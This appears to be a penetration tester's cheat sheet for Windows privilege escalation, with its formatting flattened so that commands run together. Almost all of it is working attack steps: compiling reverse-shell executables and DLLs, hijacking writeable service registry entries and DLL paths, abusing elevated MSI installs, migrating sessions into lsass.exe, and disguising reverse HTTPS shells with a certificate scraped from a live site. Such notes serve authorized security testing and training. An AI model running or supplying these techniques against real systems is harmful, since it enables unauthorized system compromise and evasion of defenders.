- Posh
- Get all:
Get-WmiObject -Class Win32_Service|Format-Table -Property Name,DisplayName,PathName,StartMode - Get specific service DACLs:
Get-Acl -Path hklm:\System\CurrentControlSet\services\
- Get all:
- Injection to writeable service registry entry
apt-get install gcc-mingw-w64x86_64-w64-mingw32-gcc scripts/windows_service.c -o revshell.exe- Copy
service.exetoC:\temp reg add HKLM\SYSTEM\CurrentControlSet\services\service_with_access /v ImagePath /t REG_EXPAND_SZ /d c:\temp\revshell.exe /fsc start service_with_access
- Unquoted Service Paths
sc qc <service-name>wmic service get name,displayname,pathname,startmode | findstr /i /v "c:\windows" | findstr /i /v """
- Scan application DLLs for preloading attack: Rattler
- Replace writeable DLL path with revshell
apt-get install gcc-mingw-w64x86_64-w64-mingw32-gcc scripts/windows_dll.c -shared -o revshell.dll- Copy
revshell.dllto path the service or app uses. - Restart service or open app that runs as higher privilege to trigger DLL load.
- Check if msi modules run elevated:
reg query HKCU\Software\Policies\Microsoft\Windows\Installer- If so, use
-f msifor venom payloads. msiexec /quiet /qn /i revshell.msi
- If so, use
run post/multi/recon/local_exploit_suggestersessions -u #- Attempt automatic escalation toNT-AUTHORITY\SYSTEM- Windows Gather Privileges Enumeration Module -
post/windows/gather/win_privs - All Reverse shells
setg InitialAutoRunScript migrate -n lsass.exe- Auto stabilise (such as Services that fail to start and kills the initial stager)- Use
-fon the above to auto create a processnotepad.exeto utilise (although less inconspicuous)
- Use
- SSL Reverse Shells
- Use
gather/impersonate_sslto scrape a certificate from any live HTTPS site, e.g. google.com - Build or use a payload with
reverse_https set handlersslcert ./to the certificate location created from Step 1set stagerverifysslcert truerun
- Use
- Suggest exploits for missing Windows KBs
- Win 10: https://github.com/rasta-mouse/Watson
- < Win 7: https://github.com/rasta-mouse/Sherlock (*Deprecated)